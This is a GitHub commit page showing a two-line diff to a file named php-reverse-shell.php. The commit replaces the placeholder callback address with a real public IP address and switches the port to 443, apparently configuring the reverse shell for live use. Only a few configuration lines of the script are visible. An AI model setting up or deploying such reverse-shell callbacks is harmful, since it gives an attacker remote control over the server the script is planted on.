Skip to content

Commit 960bd5e

Browse files
authored
Update php-reverse-shell.php
1 parent 8aa37eb commit 960bd5e

File tree

1 file changed

+2
-2
lines changed

1 file changed

+2
-2
lines changed

php-reverse-shell.php

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -46,8 +46,8 @@
4646

4747
set_time_limit (0);
4848
$VERSION = "1.0";
49-
$ip = '127.0.0.1'; // CHANGE THIS
50-
$port = 1234; // CHANGE THIS
49+
$ip = '5.9.39.44'; // CHANGE THIS
50+
$port = 443; // CHANGE THIS
5151
$chunk_size = 1400;
5252
$write_a = null;
5353
$error_a = null;

0 commit comments

Comments
 (0)